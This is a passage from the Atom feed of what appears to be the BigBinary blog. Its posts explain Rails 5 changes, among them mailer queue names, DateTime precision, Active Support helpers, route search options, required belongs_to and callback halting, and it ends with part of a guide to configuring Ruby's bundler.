      <id>https://www.bigbinary.com/blog/rails-5-allows-configuring-queue-name-for-mailers</id>
      <content type="html"><![CDATA[<p>In Rails 4.2, Active Job was integrated with Action Mailer to send emailsasynchronously.</p><p>Rails provides <code>deliver_later</code> method to enqueue mailer jobs.</p><pre><code class="language-ruby">class UserMailer &lt; ApplicationMailer  def send_notification(user)    @user = user    mail(to: user.email)  endend&gt; UserMailer.send_notification(user).deliver_later=&gt; &lt;ActionMailer::DeliveryJob:0x007ff602dd3128 @arguments=[&quot;UserMailer&quot;, &quot;send_notification&quot;, &quot;deliver_now&quot;, &lt;User id: 1, name: &quot;John&quot;, email: &quot;john@bigbinary.com&quot;&gt;], @job_id=&quot;d0171da0-86d3-49f4-ba03-37b37d4e8e2b&quot;, @queue_name=&quot;mailers&quot;, @priority=nil&gt;</code></pre><p>Note that the task of delivering email was put in queue called <code>mailers</code>.</p><p>In Rails 4.x, all background jobs are given queue named &quot;default&quot; except formailers. All outgoing mails are given the queue named &quot;mailers&quot; and we do nothave the option of changing this queue name from &quot;mailers&quot; to anything else.</p><p>Since Rails 4.x comes with minimum of two queues it makes difficult to usequeuing services like <a href="https://github.com/chanks/que">que</a> which relies onapplications having only one queue.</p><h2>Customizing queue name in Rails 5</h2><p>In Rails 5, we can now<a href="https://github.com/rails/rails/pull/18587">change queue name</a> for mailer jobsusing following configuration.</p><pre><code class="language-ruby">config.action_mailer.deliver_later_queue_name = 'default'class UserMailer &lt; ApplicationMailer  def send_notification(user)    @user = user    mail(to: user.email)  endend2.2.2 :003 &gt; user = User.last=&gt; &lt;User id: 6, name: &quot;John&quot;, email: &quot;john@bigbinary.com&quot;&gt;2.2.2 :004 &gt; UserMailer.send_notification(user).deliver_later=&gt; &lt;ActionMailer::DeliveryJob:0x007fea2182b2d0 @arguments=[&quot;UserMailer&quot;, &quot;send_notification&quot;, &quot;deliver_now&quot;, &lt;User id: 1, name: &quot;John&quot;, email: &quot;john@bigbinary.com&quot;&gt;], @job_id=&quot;316b00b2-64c8-4a2d-8153-4ce7abafb28d&quot;, @queue_name=&quot;default&quot;, @priority=nil&gt;</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 handles DateTime with better precision]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-handles-datetime-with-better-precision"/>
      <updated>2016-02-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-handles-datetime-with-better-precision</id>
      <content type="html"><![CDATA[<p>MySQL 5.6.4 and up<a href="https://dev.mysql.com/doc/refman/5.6/en/fractional-seconds.html">has added fractional seconds support</a>for TIME, DATETIME, and TIMESTAMP values, with up to microseconds (6 digits)precision.</p><h2>Adding precision to migration</h2><p>To add precision on <code>datetime</code> column we need to add <code>limit</code> option to it. Bydefault it is set to 0.</p><pre><code class="language-ruby">def change  add_column :users, :last_seen_at, :datetime, limit: 6end</code></pre><p>This adds precision(6) to <code>last_seen_at</code> column in <code>users</code> table.</p><h2>Rails 4.x behavior</h2><p>Let's look at the some of the examples with different precision values.</p><p>The task here is to set <code>end_of_day</code> value to <code>updated_at</code> column.</p><h3>With precision set to 6</h3><pre><code class="language-ruby">user = User.firstuser.updated_at=&gt; Mon, 18 Jan 2016 10:13:10 UTC +00:00user.updated_at = user.updated_at.end_of_day=&gt; Mon, 18 Jan 2016 23:59:59 UTC +00:00user.save'UPDATE `users` SET `updated_at` = '2016-01-18 23:59:59.999999' WHERE `users`.`id` = 1'user.updated_at=&gt; Mon, 18 Jan 2016 23:59:59 UTC +00:00user.reloaduser.updated_at=&gt; Mon, 18 Jan 2016 23:59:59 UTC +00:00</code></pre><p>Everything looks good here.</p><p>But let's look at what happens when precision is set to 0.</p><h3>With precision set to 0</h3><pre><code class="language-ruby">user = User.firstuser.updated_at=&gt; Mon, 18 Jan 2016 10:13:10 UTC +00:00user.updated_at = user.updated_at.end_of_day=&gt; Mon, 18 Jan 2016 23:59:59 UTC +00:00user.save'UPDATE `users` SET `updated_at` = '2016-01-18 23:59:59.999999' WHERE `users`.`id` = 1'user.updated_at=&gt; Mon, 18 Jan 2016 23:59:59 UTC +00:00</code></pre><p>So far everything looks good here too. Now let's see what happens when we reloadthis object.</p><pre><code class="language-ruby">user.reloaduser.updated_at=&gt; Tue, 19 Jan 2016 00:00:00 UTC +00:00</code></pre><p>As we can clearly see after the reload <code>updated_at</code> value has been rounded offfrom <code>2016-01-18 23:59:59.999999</code> to <code>2016-01-19 00:00:00</code>. It might seem like asmall issue but notice that date has changed from <code>01/18</code> to <code>01/19</code> because ofthis rounding.</p><h2>Improvement in Rails 5</h2><p>Rails team fixed this issue by removing fractional part if mysql adapter doesnot support precision.</p><p>Here are the two relevant commits to this change.</p><ul><li><p><a href="https://github.com/rails/rails/commit/e975d7cd1a6cb177f914024ffec8dd9a6cdc4ba1">Commit for support of precision with mysql</a></p></li><li><p><a href="https://github.com/rails/rails/commit/f1a0fa9e">Commit for checking precision on columns</a></p></li></ul><h3>With precision set to 0</h3><pre><code class="language-ruby">user.updated_at=&gt; Tue, 19 Jan 2016 00:00:00 UTC +00:00user.updated_at = user.updated_at.tomorrow.beginning_of_day - 1=&gt; Tue, 19 Jan 2016 23:59:59 UTC +00:00user.save'UPDATE `users` SET `updated_at` = '2016-01-19 23:59:59' WHERE `users`.`id` = 1'user.reloaduser.updated_at=&gt; Tue, 19 Jan 2016 23:59:59 UTC +00:00</code></pre><p>If precision is not set then fractional part gets stripped and date is notchanged.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Active Support Improvements in Rails 5]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/active-support-improvements-in-Rails-5"/>
      <updated>2016-02-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/active-support-improvements-in-Rails-5</id>
      <content type="html"><![CDATA[<p>Rails 5 has added some nice enhancements to Active Support. This blog will goover some of those changes.</p><h2>Improvements in Date, Time and Datetime</h2><h3>prev_day and next_day</h3><p>As the name of the methods suggests, <code>next_day</code><a href="https://github.com/rails/rails/pull/18335">returns next calendar date</a>.</p><p>Similarly, <code>prev_day</code> returns previous calendar date.</p><pre><code class="language-ruby">Time.current=&gt; Fri, 12 Feb 2016 08:53:31 UTC +00:00Time.current.next_day=&gt; Sat, 13 Feb 2016 08:53:31 UTC +00:00Time.current.prev_day=&gt; Thu, 11 Feb 2016 08:53:31 UTC +00:00</code></pre><h3>Support for same_time option to next_week and prev_week</h3><p>In Rails 4.x <code>next_week</code> returns beginning of next week and <code>prev_week</code> returnsbeginning of previous week.</p><p>In Rails 4.x these two methods also accept week day as a parameter.</p><pre><code class="language-ruby">Time.current=&gt; Fri, 12 Feb 2016 08:53:31 UTC +00:00Time.current.next_week=&gt; Mon, 15 Feb 2016 00:00:00 UTC +00:00Time.current.next_week(:tuesday)=&gt; Tue, 16 Feb 2016 00:00:00 UTC +00:00Time.current.prev_week(:tuesday)=&gt; Tue, 02 Feb 2016 00:00:00 UTC +00:00</code></pre><p>By using week day as parameter we can get the date one week from now but thereturned date is still the beginning of that date. How do we get one week fromthe current time.</p><p>Rails 5 add an additional option <code>same_time: true</code> to solve this problem.</p><p>Using this option, we can now get next week date from the current time.</p><pre><code class="language-ruby">Time.current=&gt; Fri, 12 Feb 2016 09:15:10 UTC +00:00Time.current.next_week=&gt; Mon, 15 Feb 2016 00:00:00 UTC +00:00Time.current.next_week(same_time: true)=&gt; Mon, 15 Feb 2016 09:15:20 UTC +00:00Time.current.prev_week=&gt; Mon, 01 Feb 2016 00:00:00 UTC +00:00Time.current.prev_week(same_time: true)=&gt; Mon, 01 Feb 2016 09:16:50 UTC +00:00</code></pre><h3>on_weekend?</h3><p>This method returns <code>true</code> if the receiving date/time is a Saturday or Sunday.</p><pre><code class="language-ruby">Time.current=&gt; Fri, 12 Feb 2016 09:47:40 UTC +00:00Time.current.on_weekend?=&gt; falseTime.current.tomorrow=&gt; Sat, 13 Feb 2016 09:48:47 UTC +00:00Time.current.tomorrow.on_weekend?=&gt; true</code></pre><h3>on_weekday?</h3><p>This method returns <code>true</code> if the receiving date/time is not a Saturday orSunday.</p><pre><code class="language-ruby">Time.current=&gt; Fri, 12 Feb 2016 09:47:40 UTC +00:00Time.current.on_weekday?=&gt; trueTime.current.tomorrow=&gt; Sat, 13 Feb 2016 09:48:47 UTC +00:00Time.current.tomorrow.on_weekday?=&gt; false</code></pre><h3>next_weekday and prev_weekday</h3><p><code>next_weekday</code> returns next day that is not a weekend.</p><p>Similarly, <code>prev_weekday</code> returns last day that is not a weekend.</p><pre><code class="language-ruby">Time.current=&gt; Fri, 12 Feb 2016 09:47:40 UTC +00:00Time.current.next_weekday=&gt; Mon, 15 Feb 2016 09:55:14 UTC +00:00Time.current.prev_weekday=&gt; Thu, 11 Feb 2016 09:55:33 UTC +00:00</code></pre><h3>Time.days_in_year</h3><pre><code class="language-ruby"># Gives number of days in current year, if year is not passed.Time.days_in_year=&gt; 366# Gives number of days in specified year, if year is passed.Time.days_in_year(2015)=&gt; 365</code></pre><h2>Improvements in Enumerable</h2><h3>pluck</h3><p><code>pluck</code> method is now <a href="https://github.com/rails/rails/pull/20350">added to</a>Enumerable objects.</p><pre><code class="language-ruby">users = [{id: 1, name: 'Max'}, {id: 2, name: 'Mark'}, {id: 3, name: 'George'}]users.pluck(:name)=&gt; [&quot;Max&quot;, &quot;Mark&quot;, &quot;George&quot;]# Takes multiple arguments as wellusers.pluck(:id, :name)=&gt; [[1, &quot;Max&quot;], [2, &quot;Mark&quot;], [3, &quot;George&quot;]]</code></pre><p>one great improvement in <code>ActiveRecord</code> due to this method addition is that whenrelation is already loaded then instead of firing query with pluck, it usesEnumerable#pluck to get data.</p><pre><code class="language-ruby"># In Rails 4.xusers = User.allSELECT `users`.* FROM `users`users.pluck(:id, :name)SELECT &quot;users&quot;.&quot;id&quot;, &quot;users&quot;.&quot;name&quot; FROM &quot;users&quot;=&gt; [[2, &quot;Max&quot;], [3, &quot;Mark&quot;], [4, &quot;George&quot;]]# In Rails 5users = User.allSELECT &quot;users&quot;.* FROM &quot;users&quot;# does not fire any queryusers.pluck(:id, :name)=&gt; [[1, &quot;Max&quot;], [2, &quot;Mark&quot;], [3, &quot;George&quot;]]</code></pre><h3>without</h3><p><a href="https://github.com/rails/rails/pull/19157">This method</a> returns a copy ofenumerable without the elements passed to the method.</p><pre><code class="language-ruby">vehicles = ['Car', 'Bike', 'Truck', 'Bus']vehicles.without(&quot;Car&quot;, &quot;Bike&quot;)=&gt; [&quot;Truck&quot;, &quot;Bus&quot;]vehicles = {car: 'Hyundai', bike: 'Honda', bus: 'Mercedes', truck: 'Tata'}vehicles.without(:bike, :bus)=&gt; {:car=&gt;&quot;Hyundai&quot;, :truck=&gt;&quot;Tata&quot;}</code></pre><h3>Array#second_to_last and Array#third_to_last</h3><pre><code class="language-ruby">['a', 'b', 'c', 'd', 'e'].second_to_last=&gt; &quot;d&quot;['a', 'b', 'c', 'd', 'e'].third_to_last=&gt; &quot;c&quot;</code></pre><p>PR for these methods can be found<a href="https://github.com/rails/rails/pull/23583">here</a>.</p><h3>Integer#positive? and Integer#negative?</h3><p><code>positive?</code> returns true if integer is positive.</p><p><code>negative?</code> returns true if integer is negative.</p><pre><code class="language-ruby">4.positive?=&gt; true4.negative?=&gt; false-4.0.positive?=&gt; false-4.0.negative?=&gt; true</code></pre><p>Commit for these methods can be found<a href="https://github.com/rails/rails/commit/e54277a4">here</a>.</p><p>These changes have now been<a href="https://github.com/ruby/ruby/blob/a837be87fdf580ac4fd58c4cb2f1ee16bab11b99/NEWS#L127">added to Ruby 2.3</a>also.</p><h3>Array#inquiry</h3><p>Rails team has<a href="https://github.com/georgeclaghorn/rails/commit/c64b99ecc98341d504aced72448bee758f3cfdaf">added</a><code>ArrayInquirer</code> to <code>ActiveSupport</code> which gives a friendlier way to check itscontents.</p><p><code>Array#inquiry</code> is a shortcut for wrapping the receiving array in an<code>ArrayInquirer</code></p><pre><code class="language-ruby">users = [:mark, :max, :david]array_inquirer1 = ActiveSupport::ArrayInquirer.new(users)# creates ArrayInquirer object which is same as array_inquirer1 abovearray_inquirer2 = users.inquiryarray_inquirer2.class=&gt; ActiveSupport::ArrayInquirer# provides methods like:array_inquirer2.mark?=&gt; truearray_inquirer2.john?=&gt; falsearray_inquirer2.any?(:john, :mark)=&gt; truearray_inquirer2.any?(:mark, :david)=&gt; truearray_inquirer2.any?(:john, :louis)=&gt; false</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 improves route search with advanced options]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-options-for-rake-routes"/>
      <updated>2016-02-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-options-for-rake-routes</id>
      <content type="html"><![CDATA[<p><code>rails routes</code> shows all the routes in the application.</p><pre><code class="language-bash">$ rake routesPrefix       Verb   URI Pattern                   Controller#Actionwishlist_user GET    /users/:id/wishlist(.:format) users#wishlist        users GET    /users(.:format)              users#index              POST   /users(.:format)              users#create     new_user GET    /users/new(.:format)          users#new    edit_user GET    /users/:id/edit(.:format)     users#edit         user GET    /users/:id(.:format)          users#show              PATCH  /users/:id(.:format)          users#update              PUT    /users/:id(.:format)          users#update              DELETE /users/:id(.:format)          users#destroy     products GET    /products(.:format)           products#index              POST   /products(.:format)           products#createand so on ......</code></pre><p>This list can be lengthy and it could be difficult to locate exactly what useris looking for.</p><h2>Ways to search specific routes prior to Rails 5</h2><p>To see only specific routes we can use commands like <code>grep</code>.</p><pre><code class="language-bash">$ rake routes | grep productsPrefix       Verb   URI Pattern                   Controller#Actionproducts      GET    /products(.:format)           products#index              POST   /products(.:format)           products#create</code></pre><h2>Options with Rails 5</h2><p>Rails 5 <a href="https://github.com/rails/rails/pull/23225">has added</a> options in<code>rails routes</code> to perform pattern matching on routes.</p><h4>Controller specific search</h4><p>Use option <code>-c</code> to search for routes related to controller. Also remember thatRails does case insensitive search. So <code>rails routes -c users</code> is same as<code>rails routes -c Users</code>.</p><pre><code class="language-bash"># Search for Controller name$ rails routes -c users       Prefix Verb   URI Pattern                   Controller#Actionwishlist_user GET    /users/:id/wishlist(.:format) users#wishlist        users GET    /users(.:format)              users#index              POST   /users(.:format)              users#create# Search for namespaced Controller name.$ rails routes -c admin/users         Prefix Verb   URI Pattern                     Controller#Action    admin_users GET    /admin/users(.:format)          admin/users#index                POST   /admin/users(.:format)          admin/users#create# Search for namespaced Controller name.$ rails routes -c Admin::UsersController         Prefix Verb   URI Pattern                     Controller#Action    admin_users GET    /admin/users(.:format)          admin/users#index                POST   /admin/users(.:format)          admin/users#create</code></pre><h4>Pattern specific search</h4><p>Use <code>-g</code> option to do<a href="https://github.com/rails/rails/pull/23611">general purpose</a> pattern matching.This results in any routes that partially matches Prefix, Controller#Action orthe URI pattern.</p><pre><code class="language-bash"># Search with pattern$ rails routes -g wishlist       Prefix Verb URI Pattern                   Controller#Actionwishlist_user GET  /users/:id/wishlist(.:format) users#wishlist# Search with HTTP Verb$ rails routes -g POST    Prefix Verb URI Pattern            Controller#Action           POST /users(.:format)       users#create           POST /admin/users(.:format) admin/users#create           POST /products(.:format)    products#create# Search with URI pattern$ rails routes -g admin       Prefix Verb   URI Pattern                     Controller#Action  admin_users GET    /admin/users(.:format)          admin/users#index              POST   /admin/users(.:format)          admin/users#create</code></pre><p>Note that using CONTROLLER=some_controller has now been deprecated. This had thesame effect as searching for a controller specific route.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 makes belongs_to association required by default]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-makes-belong-to-association-required-by-default"/>
      <updated>2016-02-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-makes-belong-to-association-required-by-default</id>
      <content type="html"><![CDATA[<p>In Rails 5, whenever we define a <code>belongs_to</code> association, it is required tohave the associated record present by default after<a href="https://github.com/rails/rails/pull/18937">this</a> change.</p><p>It triggers validation error if associated record is not present.</p><pre><code class="language-ruby">class User &lt; ApplicationRecordendclass Post &lt; ApplicationRecord  belongs_to :userendpost = Post.create(title: 'Hi')=&gt; &lt;Post id: nil, title: &quot;Hi&quot;, user_id: nil, created_at: nil, updated_at: nil&gt;post.errors.full_messages.to_sentence=&gt; &quot;User must exist&quot;</code></pre><p>As we can see, we can't create any <code>post</code> record without having an associated<code>user</code> record.</p><h2>How to achieve this behavior before Rails 5</h2><p>In Rails 4.x world To add validation on <code>belongs_to</code> association, we need to addoption <code>required: true</code> .</p><pre><code class="language-ruby">class User &lt; ApplicationRecordendclass Post &lt; ApplicationRecord  belongs_to :user, required: trueendpost = Post.create(title: 'Hi')=&gt; &lt;Post id: nil, title: &quot;Hi&quot;, user_id: nil, created_at: nil, updated_at: nil&gt;post.errors.full_messages.to_sentence=&gt; &quot;User must exist&quot;</code></pre><p>By default, <code>required</code> option is set to <code>false</code>.</p><h2>Opting out of this default behavior in Rails 5</h2><p>We can pass <code>optional: true</code> to the <code>belongs_to</code> association which would removethis validation check.</p><pre><code class="language-ruby">class Post &lt; ApplicationRecord  belongs_to :user, optional: trueendpost = Post.create(title: 'Hi')=&gt; &lt;Post id: 2, title: &quot;Hi&quot;, user_id: nil&gt;</code></pre><p>But, what if we do not need this behavior anywhere in our entire application andnot just a single model?</p><h2>Opting out of this default behavior for the entire application</h2><p>New Rails 5 application comes with an initializer named<code>new_framework_defaults.rb</code>.</p><p>When upgrading from older version of Rails to Rails 5, we can add thisinitializer by running <code>bin/rails app:update</code> task.</p><p>This initializer has config named<code>Rails.application.config.active_record.belongs_to_required_by_default = true</code></p><p>For new Rails 5 application the value is set to <code>true</code> but for old applications,this is set to <code>false</code> by default.</p><p>We can turn off this behavior by keeping the value to <code>false</code>.</p><pre><code class="language-ruby">Rails.application.config.active_record.belongs_to_required_by_default = falseclass Post &lt; ApplicationRecord  belongs_to :userendpost = Post.create(title: 'Hi')=&gt; &lt;Post id: 3, title: &quot;Hi&quot;, user_id: nil, created_at: &quot;2016-02-11 12:36:05&quot;, updated_at: &quot;2016-02-11 12:36:05&quot;&gt;</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 doesn't halt callback chain if false is returned]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-does-not-halt-callback-chain-when-false-is-returned"/>
      <updated>2016-02-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-does-not-halt-callback-chain-when-false-is-returned</id>
      <content type="html"><![CDATA[<p>Before Rails 5, returning <code>false</code> from any <code>before_</code> callback in <code>ActiveModel</code>or <code>ActiveModel::Validations</code>, <code>ActiveRecord</code> and <code>ActiveSupport</code> resulted inhalting of callback chain.</p><pre><code class="language-ruby">class Order &lt; ActiveRecord::Base  before_save :set_eligibility_for_rebate  before_save :ensure_credit_card_is_on_file  def set_eligibility_for_rebate    self.eligibility_for_rebate ||= false  end  def ensure_credit_card_is_on_file    puts &quot;check if credit card is on file&quot;  endendOrder.create!=&gt; ActiveRecord::RecordNotSaved: ActiveRecord::RecordNotSaved</code></pre><p>In this case the code is attempting to set the value of <code>eligibility_for_rebate</code>to false. However the side effect of the way Rails callbacks work is that thecallback chain will be halted simply because one of the callbacks returned<code>false</code>.</p><p>Right now, to fix this we need to return <code>true</code> from <code>before_</code> callbacks, sothat callbacks are not halted.</p><h2>Improvements in Rails 5</h2><p>Rails 5 fixed this issue <a href="https://github.com/rails/rails/pull/17227">by adding</a><code>throw(:abort)</code> to explicitly halt callbacks.</p><p>Now, if any <code>before_</code> callback returns <code>false</code> then callback chain is nothalted.</p><pre><code class="language-ruby">class Order &lt; ActiveRecord::Base  before_save :set_eligibility_for_rebate  before_save :ensure_credit_card_is_on_file  def set_eligibility_for_rebate    self.eligibility_for_rebate ||= false  end  def ensure_credit_card_is_on_file    puts &quot;check if credit card is on file&quot;  endendOrder.create!=&gt; check if credit card is on file=&gt; &lt;Order id: 4, eligibility_for_rebate: false&gt;</code></pre><p>To explicitly halt the callback chain, we need to use <code>throw(:abort)</code>.</p><pre><code class="language-ruby">class Order &lt; ActiveRecord::Base  before_save :set_eligibility_for_rebate  before_save :ensure_credit_card_is_on_file  def set_eligibility_for_rebate    self.eligibility_for_rebate ||= false    throw(:abort)  end  def ensure_credit_card_is_on_file    puts &quot;check if credit card is on file&quot;  endendOrder.create!=&gt; ActiveRecord::RecordNotSaved: Failed to save the record</code></pre><h2>Opting out of this behavior</h2><p>The new Rails 5 application comes up with initializer named<code>callback_terminator.rb</code>.</p><p><code>ActiveSupport.halt_callback_chains_on_return_false = false</code></p><p>By default the value is to set to <code>false</code>.</p><p>We can turn off this default behavior by changing this configuration to <code>true</code>.However then Rails shows deprecation warning when <code>false</code> is returned fromcallback.</p><pre><code class="language-ruby">ActiveSupport.halt_callback_chains_on_return_false = trueclass Order &lt; ApplicationRecord  before_save :set_eligibility_for_rebate  before_save :ensure_credit_card_is_on_file  def set_eligibility_for_rebate    self.eligibility_for_rebate ||= false  end  def ensure_credit_card_is_on_file    puts &quot;check if credit card is on file&quot;  endend=&gt; DEPRECATION WARNING: Returning `false` in Active Record and Active Model callbacks will not implicitly halt a callback chain in the next release of Rails. To explicitly halt the callback chain, please use `throw :abort` instead.ActiveRecord::RecordNotSaved: Failed to save the record</code></pre><h2>How older applications will work with this change?</h2><p>The initializer configuration will be present only in newly generated Rails 5apps.</p><p>If you are upgrading from an older version of Rails, you can add thisinitializer yourself to enable this change for entire application.</p><p>This is a welcome change in Rails 5 which will help prevent accidental haltingof the callbacks.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Configuring bundler using bundle config]]></title>
       <author><name>Prajakta Tambe</name></author>
      <link href="https://www.bigbinary.com/blog/configuring-bundler-using-bundle-config"/>
      <updated>2016-02-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/configuring-bundler-using-bundle-config</id>
      <content type="html"><![CDATA[<p><a href="http://bundler.io/">Bundler</a>helps in managing gem dependencies of ruby projects.You can specify which gems and versions you need, bundler will install them and load them at runtime.Bundler ensures that gems you need are present in the environment youneed.</p><h2>Bundle configurations</h2><p>Bundler gets its configurations from local application <code>(app/.bundle/config)</code>, <code>environment variables</code> and users home directory <code>(~/.bundle/config)</code> in the order of priority.</p><p>To list all bundler configurations for the current bundle, run bundle config without any parameters. You will also get the location where the value is set.</p><pre><code class="language-plaintext">$ bundle configSettings are listed in order of priority. The top value will be used.</code></pre><p>You might see different result based on configuration of bundler on yourmachine.</p><p>To get value for the specific configuration setting, run bundle config with name.</p><pre><code class="language-plaintext">$ bundle config disable_multisourceSettings for `disable_multisource` in order of priority. The top value will be usedYou have not configured a value for `disable_multistore`</code></pre><h2>Setting Configuration</h2><p>To set the value of the configuration setting, use bundle config with name and value. Configuration will be stored in <code>~/.bundle/config</code>.</p><pre><code class="language-plaintext">$ bundle config build.pg --with-pg-config=/opt/local/lib/postgresql91/bin/pg_config$ bundle configSettings are listed in order of priority. The top value will be used.build.pgSet for the current user (/Users/username/.bundle/config): &quot;--with-pg-config=/opt/local/lib/postgresql91/bin/pg_config&quot;</code></pre><p>If any config already has a value, it will be overwritten directly and user will be warned.</p><pre><code class="language-plaintext">$ bundle config build.pg --with-pg-config=/usr/pgsql-9.1/bin/pg_configYou are replacing the current global value of build.pg, which is currently &quot;--with-pg-config=/opt/local/lib/postgresql91/bin/pg_config&quot;</code></pre><h2>Application level configuration</h2><p>By default setting configuration value will set it for all projects on the machine. You can set configurations specific to local application with <code>--local</code> option. This will store value in <code>app/.bundle/config</code>.</p><pre><code class="language-plaintext">$ bundle config --local auto_install falseYou are replacing the current local value of auto_install, which is currently nil$ bundle config auto_installSettings for `auto_install` in order of priority. The top value will be usedSet for your local app (/Users/username/Documents/Workspace/app-name/.bundle/config): &quot;false&quot;Set for the current user (/Users/username/.bundle/config): &quot;true&quot;</code></pre><p>You can run bundle config with <code>--global</code>.This will set values at global level i.e. across all applications on the machine.It will be similar to running bundle config without any options.</p><h2>Deleting configuration</h2><p>You can delete configuration with <code>--delete</code> option.</p><pre><code class="language-plaintext">$ bundle config --delete auto_install$ bundle configSettings are listed in order of priority. The top value will be used.disable_multisourceSet for the current user (/Users/username/.bundle/config): &quot;true&quot;build.pgSet for the current user (/Users/username/.bundle/config): &quot;--with-pg-config=/usr/pgsql-9.1/bin/pg_config&quot;</code></pre><p>This is not compatible with <code>--local</code> and <code>--global</code>. This will delete configuration from local and global resources.</p><h2>Build Options</h2><p>You can pass the flags required for installing particular gem to bundler with bundle config.</p><p>Many El Capitan users face an<a href="http://stackoverflow.com/questions/30818391/gem-eventmachine-fatal-error-openssl-ssl-h-file-not-found">issue</a>while installing <code>eventmachine</code> gem.The issue can be resolved by providing path to OpenSSL include directory while installing <code>eventmachine</code>.</p><pre><code class="language-plaintext">$ gem install eventmachine -v '1.0.8' -- --with-cppflags=-I/usr/local/opt/openssl/include</code></pre><p>As location of configuration will vary from machine to machine, we can set this with bundle config.</p><pre><code class="language-plaintext">$ bundle config build.eventmachine --with-cppflags=-I/usr/local/opt/openssl/include</code></pre><p>Now bundler will pick this configuration while installing <code>eventmachine</code> gem.</p><h2>Configuration keys</h2><p>Various configuration keys are available with bundler.These keys are available in two forms.You can specify them in canonical form with <code>bundle config</code> or set them in environment variable form.Following are canonical forms and their usage.Corresponding environment variables are specified in bracket.</p><h4>auto_install</h4><p>Setting auto_install config will enable automatic installing of gems instead of raising an error.This applies to <code>show</code>, <code>binstubs</code>, <code>outdated</code>, <code>exec</code>, <code>open</code>, <code>console</code>, <code>license</code>, <code>clean</code> commands.</p><p>Example, When you try to run <code>bundle show</code> for the gem which is not yet installed you will get an error.</p><pre><code class="language-plaintext">$ bundle show pgCould not find gem 'pg'.</code></pre><p>You can set <code>auto_install</code> to remove this error and install gem.</p><pre><code class="language-plaintext">$ bundle config auto_install true$ bundle show pg# Gem will get installed/Users/username/.rvm/gems/ruby-2.2.2@gemset-auto/gems/pg-0.17.1</code></pre><h4>path (BUNDLE_PATH)</h4><p>You can specify location to install your gems. Default path is $GEM_HOME for development and vendor/bundle when --deployment is used.</p><pre><code class="language-plaintext">$ bundle config path NEW_PATH$ bundle install# Gems will get installed##Bundle complete! 4 Gemfile dependencies, 35 gems now installed.Bundled gems are installed into NEW_PATH.</code></pre><h4>frozen (BUNDLE_FROZEN)</h4><p>You can freeze changes to your Gemfile.</p><pre><code class="language-plaintext">$ bundle config frozen true</code></pre><p>If frozen is set and you try to run <code>bundle install</code> with changed Gemfile, you will get following warning.</p><pre><code class="language-plaintext">You are trying to install in deployment mode after changingyour Gemfile. Run `bundle install` elsewhere and add theupdated Gemfile.lock to version control.If this is a development machine, remove the /Users/username/Documents/Workspace/app-name/Gemfile freezeby running `bundle install --no-deployment`.You have added to the Gemfile:* minitest-reporters</code></pre><h4>without (BUNDLE_WITHOUT)</h4><p>You can skip installing groups of gems with bundle install. Specify <code>:</code> separated group names whose gems bundler should not install.</p><pre><code class="language-plaintext">$ bundle config --local without development:test$ bundle install# This will install gems skipping development and test group gems.</code></pre><h4>bin (BUNDLE_BIN)</h4><p>You can set the directory to install executables from gems in the bundle.</p><pre><code class="language-plaintext">$ bundle config bin NEW_PATH$ bundle install# This will install executables in NEW_PATH</code></pre><h4>gemfile (BUNDLE_GEMFILE)</h4><p>You can set the file which bundler should use as theGemfile. By default, bundler will use <code>Gemfile</code>. The location of this file also sets the root of the project, which is used to resolve relative paths in the Gemfile.</p><pre><code class="language-plaintext">$ bundle config gemfile Gemfile-rails4$ bundle install# This will install gems from Gemfile-rails4 file.</code></pre><h4>ssl_ca_cert (BUNDLE_SSL_CA_CERT)</h4><p>This specifies path to a designated CA certificate file or folder containing multiple certificates for trusted CAs in PEM format. You can specify your own <code>https</code> sources in Gemfile with corresponding certificates specified via <code>bundle config</code>.</p><pre><code class="language-plaintext">$ bundle config ssl_ca_cert NEW_CERTIFICATE_PATH</code></pre><h4>ssl_client_cert (BUNDLE_SSL_CLIENT_CERT)</h4><p>This specifies path to a designated file containing a X.509 client certificate and key in PEM format.</p><pre><code class="language-plaintext">$ bundle config ssl_client_cert NEW_CERTIFICATE_PATH</code></pre><h4>cache_path (BUNDLE_CACHE_PATH)</h4><p>You can set the path to place cached gems while running bundle package.</p><pre><code class="language-plaintext">$ bundle config cache_path vendor/new-cache-path$ bundle packageUsing colorize 0.7.7Using pg 0.17.1Using bundler 1.11.2Updating files in vendor/new-cache-path  * colorize-0.7.7.gem  * pg-0.17.1.gemBundle complete! 2 Gemfile dependencies, 3 gems now installed.Use `bundle show [gemname]` to see where a bundled gem is installed.Updating files in vendor/new-cache-path</code></pre><h4>disable_multisource (BUNDLE_DISABLE_MULTISOURCE)</h4><p>When set, Gemfiles containing multiple sources will produce an error instead of a warning.</p><p>With Gemfile,</p><pre><code class="language-plaintext">source 'https://rubygems.org'source 'http://gems.github.com'ruby '2.2.2'</code></pre><p>When you try to run <code>bundle install</code>, you will get warning.</p><pre><code class="language-plaintext">$ bundle installWarning: this Gemfile contains multiple primary sources. Using `source` more than once without a block is a security risk, and may result in installing unexpected gems. To resolve this warning, use a block to indicate which gems should come from the secondary source. To upgrade this warning to an error, run `bundle config disable_multisource true`.</code></pre><pre><code class="language-plaintext">$ bundle config --local disable_multisource true$ bundle install[!] There was an error parsing `Gemfile`: Warning: this Gemfile contains multiple primary sources. Each source after the first must include a block to indicate which gems should come from that source. To downgrade this error to a warning, run `bundle config --delete disable_multisource`. Bundler cannot continue. #  from /Users/username/Documents/Workspace//Gemfile:2 #  ------------------------------------------- #  source 'https://rubygems.org' 